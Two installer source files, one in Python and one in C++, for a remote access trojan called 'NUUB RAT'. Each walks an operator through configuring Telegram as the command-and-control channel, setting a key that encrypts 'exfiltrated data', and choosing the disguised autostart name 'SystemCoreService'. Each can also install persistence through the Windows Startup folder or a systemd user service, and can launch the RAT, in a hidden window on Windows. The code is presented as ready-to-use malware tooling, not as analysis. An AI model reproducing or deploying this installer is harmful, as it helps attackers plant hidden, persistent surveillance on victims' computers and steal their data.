File: tools/installer.py
#!/usr/bin/env python3
"""
NUUB RAT - Interactive Installer
Simple setup wizard that configures everything via terminal prompts.
"""

import json
import os
import random
import string
import shutil
import sys
import platform

def clear_screen():
    os.system('cls' if os.name == 'nt' else 'clear')

def print_banner():
    print("""
 _   _ _   _  ___ _____    ___  ___   _   _  _____
| | | | \\ | |/ _ \\_   _|  / _ \\|_ _| \\ | |/ / _ \\
| | | |  \\| | | | || |   | | | || ||  \\| | | | |
| |_| | |\\  | |_| || |   | |_| || || |\\  | |_| |
 \\___/|_| \\_|\\___/ |_|    \\___/___|_| \\_|\\___/

   Interactive Installer v2.0
""")

def random_string(length=16):
    chars = string.ascii_letters + string.digits
    return ''.join(random.choices(chars, k=length))

def read_input(prompt, default="", secret=False):
    if default:
        display = f"{prompt} [{default}]: "
    else:
        display = f"{prompt}: "

    if secret:
        import getpass
        try:
            value = getpass.getpass(display)
        except:
            value = input(display)
    else:
        value = input(display)

    return value if value else default

def read_yes_no(prompt, default=False):
    def_str = "y/n" if not default else "Y/n"
    value = input(f"{prompt} ({def_str}): ").lower().strip()
    if not value:
        return default
    return value in ('y', 'yes')

def read_number(prompt, default=30):
    value = input(f"{prompt} [{default}]: ").strip()
    if not value:
        return default
    try:
        return int(value)
    except ValueError:
        return default

def main():
    clear_screen()
    print_banner()

    print("This installer will configure NUUB RAT for your use.\n")

    # Check for existing config
    if os.path.exists("config.json"):
        print("[WARNING] config.json already exists!")
        if not read_yes_no("Overwrite?"):
            print("Setup cancelled.")
            return

    # Step 1: Telegram Bot Token
    print("\n" + "="*50)
    print("[1/6] Telegram Bot Configuration")
    print("="*50)
    print("Create a bot via @BotFather on Telegram and get your token.\n")

    bot_token = read_input("Bot Token", secret=True)
    if not bot_token:
        print("[ERROR] Bot token is required!")
        return

    # Step 2: Admin Chat IDs
    print("\n" + "="*50)
    print("[2/6] Admin Configuration")
    print("="*50)
    print("Send /start to your bot and note your chat ID.\n")

    admin_ids = []
    first_id = read_input("Admin Chat ID")
    if first_id:
        admin_ids.append(first_id)

    while read_yes_no("Add another admin?"):
        admin_id = read_input("Admin Chat ID")
        if admin_id:
            admin_ids.append(admin_id)

    if not admin_ids:
        print("[ERROR] At least one admin ID is required!")
        return

    # Step 3: PC Identifier
    print("\n" + "="*50)
    print("[3/6] PC Configuration")
    print("="*50)

    pc_id = read_input("PC Identifier", "PC-001")

    # Step 4: Encryption Password
    print("\n" + "="*50)
    print("[4/6] Security Configuration")
    print("="*50)
    print("This password encrypts all exfiltrated data.\n")

    enc_password = read_input("Encryption Password", secret=True)
    if not enc_password:
        enc_password = random_string(16)
        print(f"Generated random password: {enc_password}")

    # Step 5: Advanced Configuration
    print("\n" + "="*50)
    print("[5/6] Advanced Configuration")
    print("="*50)

    use_c2_encryption = read_yes_no("Enable C2 traffic encryption?", False)
    c2_key = ""
    if use_c2_encryption:
        c2_key = read_input("C2 Encryption Key", secret=True)
        if not c2_key:
            c2_key = random_string(32)
            print(f"Generated random C2 key: {c2_key}")

    heartbeat = read_number("Heartbeat interval (minutes)", 30)

    # Step 6: Generate Config
    print("\n" + "="*50)
    print("[6/6] Generating Configuration")
    print("="*50)

    config = {
        "telegram_bot_token": bot_token,
        "admin_chat_id": int(admin_ids[0]),
        "admin_chat_ids": [int(x) for x in admin_ids],
        "pc_identifier": pc_id,
        "encryption_password": enc_password,
        "master_log_filename": "log_master.txt",
        "activity_log_filename": "activity_log.csv",
        "auto_start_entry_name": "SystemCoreService",
        "log_filename": "nuub.log",
        "heartbeat_interval_minutes": heartbeat,
        "c2_encryption_key": c2_key
    }

    # Write config
    with open("config.json", "w") as f:
        json.dump(config, f, indent=4)

    print("\n[OK] Configuration saved to config.json")

    # Summary
    print("\n" + "="*50)
    print("INSTALLATION COMPLETE")
    print("="*50)

    print(f"\nConfiguration Summary:")
    print(f"  Bot Token: {bot_token[:10]}...")
    print(f"  Admin IDs: {', '.join(admin_ids)}")
    print(f"  PC ID: {pc_id}")
    print(f"  C2 Encryption: {'Enabled' if use_c2_encryption else 'Disabled'}")
    print(f"  Heartbeat: {heartbeat} minutes")

    print(f"\nNext Steps:")
    print(f"  1. Place config.json in the same directory as nuub")
    print(f"  2. Run: ./nuub")
    print(f"  3. Send /start to your bot to verify connection")

    # Optional: Add to startup
    if read_yes_no("\nAdd to system startup?", False):
        if platform.system() == "Windows":
            startup_path = os.path.join(
                os.environ['APPDATA'],
                'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup'
            )
            source = os.path.join(os.getcwd(), 'nuub.exe')
            dest = os.path.join(startup_path, 'nuub.exe')

            if os.path.exists(source):
                shutil.copy2(source, dest)
                print(f"[OK] Added to startup: {dest}")
            else:
                print("[INFO] nuub.exe not found in current directory")

        elif platform.system() == "Linux":
            # Create systemd user service
            service_dir = os.path.expanduser("~/.config/systemd/user")
            os.makedirs(service_dir, exist_ok=True)

            exe_path = os.path.abspath("nuub")
            service_file = os.path.join(service_dir, "nuub.service")

            with open(service_file, "w") as f:
                f.write(f"""[Unit]
Description=NUUB Agent
After=network.target

[Service]
Type=simple
ExecStart={exe_path}
Restart=on-failure

[Install]
WantedBy=default.target
""")
            print(f"[OK] Created systemd service: {service_file}")
            print("     Run: systemctl --user enable --now nuub")

    # Optional: Run now
    if read_yes_no("\nRun the RAT now?", False):
        print("\nStarting NUUB RAT...")
        if platform.system() == "Windows":
            os.startfile("nuub.exe")
        else:
            os.system("./nuub &")

    print("\nInstallation finished!")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n\nSetup cancelled.")
        sys.exit(1)
    except Exception as e:
        print(f"\n[ERROR] {e}")
        sys.exit(1)

File: tools/installer.cpp
// NUUB Installer - Interactive setup for the RAT
// Compile: cl /EHsc /std:c++17 /std:c17 installer.cpp nlohmann_json\single_include\nlohmann\json.hpp /Fe:installer.exe
// Or use CMake build system

#include <iostream>
#include <fstream>
#include <string>
#include <vector>
#include <cstdint>
#include <cstdlib>
#include <filesystem>
#include <algorithm>
#include <random>

#ifdef _WIN32
#include <Windows.h>
#include <shellapi.h>
#pragma comment(lib, "shell32.lib")
#endif

namespace fs = std::filesystem;

// Simple JSON builder
class JsonBuilder {
    std::string indent_;
    std::string content_;

public:
    JsonBuilder() : indent_("") {}

    void begin_object() {
        content_ += "{\n";
        indent_ += "    ";
    }

    void end_object() {
        indent_.resize(indent_.size() - 4);
        content_ += indent_ + "}\n";
    }

    void add_string(const std::string& key, const std::string& value) {
        content_ += indent_ + "\"" + key + "\": \"" + value + "\"";
    }

    void add_number(const std::string& key, int64_t value) {
        content_ += indent_ + "\"" + key + "\": " + std::to_string(value);
    }

    void add_bool(const std::string& key, bool value) {
        content_ += indent_ + "\"" + key + "\": " + (value ? "true" : "false");
    }

    void add_array_begin(const std::string& key) {
        content_ += indent_ + "\"" + key + "\": [";
    }

    void add_array_end() {
        content_ += "]";
    }

    void add_array_element(const std::string& value) {
        content_ += "\"" + value + "\"";
    }

    void add_array_number(int64_t value) {
        content_ += std::to_string(value);
    }

    void comma() {
        content_ += ",\n";
    }

    std::string to_string() const {
        return content_;
    }
};

// Read line from user with default
std::string read_line(const std::string& prompt, const std::string& default_value = "") {
    std::cout << prompt;
    if (!default_value.empty()) {
        std::cout << " [" << default_value << "]";
    }
    std::cout << ": ";

    std::string input;
    std::getline(std::cin, input);

    if (input.empty() && !default_value.empty()) {
        return default_value;
    }
    return input;
}

// Read number from user
int64_t read_number(const std::string& prompt, int64_t default_value) {
    std::string input = read_line(prompt, std::to_string(default_value));
    try {
        return std::stoll(input);
    } catch (...) {
        return default_value;
    }
}

// Read yes/no from user
bool read_yes_no(const std::string& prompt, bool default_value = false) {
    std::string def = default_value ? "y" : "n";
    std::string input = read_line(prompt + " (y/n)", def);
    std::transform(input.begin(), input.end(), input.begin(), ::tolower);
    return input == "y" || input == "yes";
}

// Generate random string (cryptographically secure)
std::string random_string(int length) {
    const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    std::string result;
    result.resize(length);
    std::random_device rd;
    std::mt19937 gen(rd());
    std::uniform_int_distribution<> dist(0, sizeof(charset) - 2);
    for (int i = 0; i < length; ++i) {
        result[i] = charset[dist(gen)];
    }
    return result;
}

void print_banner() {
    std::cout << R"(
 _   _ _   _  ___ _____    ___  ___   _   _  _____
| | | | \ | |/ _ \_   _|  / _ \|_ _| \ | |/ / _ \
| | | |  \| | | | || |   | | | || ||  \| | | | |
| |_| | |\  | |_| || |   | |_| || || |\  | |_| |
 \___/|_| \_|\___/ |_|    \___/___|_| \_|\___/

   Interactive Installer v2.0
)" << std::endl;
}

void print_step(int step, int total, const std::string& description) {
    std::cout << "\n[" << step << "/" << total << "] " << description << std::endl;
    std::cout << std::string(50, '-') << std::endl;
}

int main() {
    print_banner();

    // Check for admin privileges (optional, needed for some features)
    bool is_admin = false;
    #ifdef _WIN32
    HANDLE hToken;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        TOKEN_ELEVATION elevation;
        DWORD size;
        if (GetTokenInformation(hToken, TokenElevation, &elevation, sizeof(elevation), &size)) {
            is_admin = elevation.TokenIsElevated != 0;
        }
        CloseHandle(hToken);
    }
    #endif

    if (is_admin) {
        std::cout << "[OK] Running with administrator privileges" << std::endl;
    } else {
        std::cout << "[INFO] Running without admin privileges (some features limited)" << std::endl;
    }

    std::cout << "\nThis installer will configure NUUB RAT for your use.\n" << std::endl;

    // Step 1: Telegram Bot Token
    print_step(1, 6, "Telegram Bot Configuration");
    std::cout << "Create a bot via @BotFather on Telegram and get your token.\n" << std::endl;

    std::string bot_token = read_line("Bot Token");

    // Step 2: Admin Chat IDs
    print_step(2, 6, "Admin Configuration");
    std::cout << "Send /start to your bot and note your chat ID.\n" << std::endl;

    std::vector<std::string> admin_ids;
    std::string first_id = read_line("Admin Chat ID");
    if (!first_id.empty()) {
        admin_ids.push_back(first_id);
    }

    while (read_yes_no("Add another admin?")) {
        std::string id = read_line("Admin Chat ID");
        if (!id.empty()) {
            admin_ids.push_back(id);
        }
    }

    // Step 3: PC Identifier
    print_step(3, 6, "PC Configuration");
    std::string pc_id = read_line("PC Identifier", "PC-001");

    // Step 4: Encryption Password
    print_step(4, 6, "Security Configuration");
    std::cout << "This password encrypts all exfiltrated data.\n" << std::endl;

    std::string enc_password = read_line("Encryption Password");

    if (enc_password.empty()) {
        enc_password = random_string(16);
        std::cout << "Generated random password: " << enc_password << std::endl;
    }

    // Step 5: C2 Encryption (optional)
    print_step(5, 6, "Advanced Configuration");
    bool use_c2_encryption = read_yes_no("Enable C2 traffic encryption?", false);

    std::string c2_key;
    if (use_c2_encryption) {
        c2_key = read_line("C2 Encryption Key");
        if (c2_key.empty()) {
            c2_key = random_string(32);
            std::cout << "Generated random C2 key: " << c2_key << std::endl;
        }
    }

    int64_t heartbeat = read_number("Heartbeat interval (minutes)", 30);

    // Step 6: Generate Config
    print_step(6, 6, "Generating Configuration");

    // Build JSON manually (no external dependencies needed)
    std::string json = "{\n";
    json += "    \"telegram_bot_token\": \"" + bot_token + "\",\n";
    json += "    \"admin_chat_id\": " + (admin_ids.empty() ? "0" : admin_ids[0]) + ",\n";
    json += "    \"admin_chat_ids\": [";
    for (size_t i = 0; i < admin_ids.size(); ++i) {
        if (i > 0) json += ", ";
        json += admin_ids[i];
    }
    json += "],\n";
    json += "    \"pc_identifier\": \"" + pc_id + "\",\n";
    json += "    \"encryption_password\": \"" + enc_password + "\",\n";
    json += "    \"master_log_filename\": \"log_master.txt\",\n";
    json += "    \"activity_log_filename\": \"activity_log.csv\",\n";
    json += "    \"auto_start_entry_name\": \"SystemCoreService\",\n";
    json += "    \"log_filename\": \"nuub.log\",\n";
    json += "    \"heartbeat_interval_minutes\": " + std::to_string(heartbeat) + ",\n";
    json += "    \"c2_encryption_key\": \"" + c2_key + "\"\n";
    json += "}\n";

    // Write config file
    std::ofstream config_file("config.json");
    if (config_file.is_open()) {
        config_file << json;
        config_file.close();
        std::cout << "\n[OK] Configuration saved to config.json" << std::endl;
    } else {
        std::cerr << "[ERROR] Could not write config.json" << std::endl;
        return 1;
    }

    // Print summary
    std::cout << "\n" << std::string(50, '=') << std::endl;
    std::cout << "INSTALLATION COMPLETE" << std::endl;
    std::cout << std::string(50, '=') << std::endl;

    std::cout << "\nConfiguration Summary:" << std::endl;
    std::cout << "  Bot Token: " << bot_token.substr(0, 10) << "..." << std::endl;
    std::cout << "  Admin IDs: ";
    for (size_t i = 0; i < admin_ids.size(); ++i) {
        if (i > 0) std::cout << ", ";
        std::cout << admin_ids[i];
    }
    std::cout << std::endl;
    std::cout << "  PC ID: " << pc_id << std::endl;
    std::cout << "  C2 Encryption: " << (use_c2_encryption ? "Enabled" : "Disabled") << std::endl;
    std::cout << "  Heartbeat: " << heartbeat << " minutes" << std::endl;

    std::cout << "\nNext Steps:" << std::endl;
    std::cout << "  1. Place config.json in the same directory as nuub.exe" << std::endl;
    std::cout << "  2. Run: nuub.exe" << std::endl;
    std::cout << "  3. Send /start to your bot to verify connection" << std::endl;

    if (read_yes_no("\nCopy executable to startup folder?", false)) {
        #ifdef _WIN32
        // Get startup folder path
        char startup_path[MAX_PATH];
        if (SHGetFolderPathA(NULL, CSIDL_STARTUP, NULL, 0, startup_path) == S_OK) {
            fs::path dest = fs::path(startup_path) / "nuub.exe";
            fs::path source = fs::current_path() / "nuub.exe";

            if (fs::exists(source)) {
                fs::copy_file(source, dest, fs::copy_options::overwrite_existing);
                std::cout << "[OK] Copied to startup folder: " << dest << std::endl;
            } else {
                std::cout << "[INFO] nuub.exe not found in current directory" << std::endl;
            }
        }
        #endif
    }

    if (read_yes_no("Run the RAT now?", false)) {
        std::cout << "\nStarting NUUB RAT..." << std::endl;
        #ifdef _WIN32
        ShellExecuteA(nullptr, "open", "nuub.exe", nullptr, nullptr, SW_HIDE);
        #else
        system("./nuub &");
        #endif
    }

    std::cout << "\nInstallation finished. Press Enter to exit..." << std::endl;
    std::cin.get();

    return 0;
}
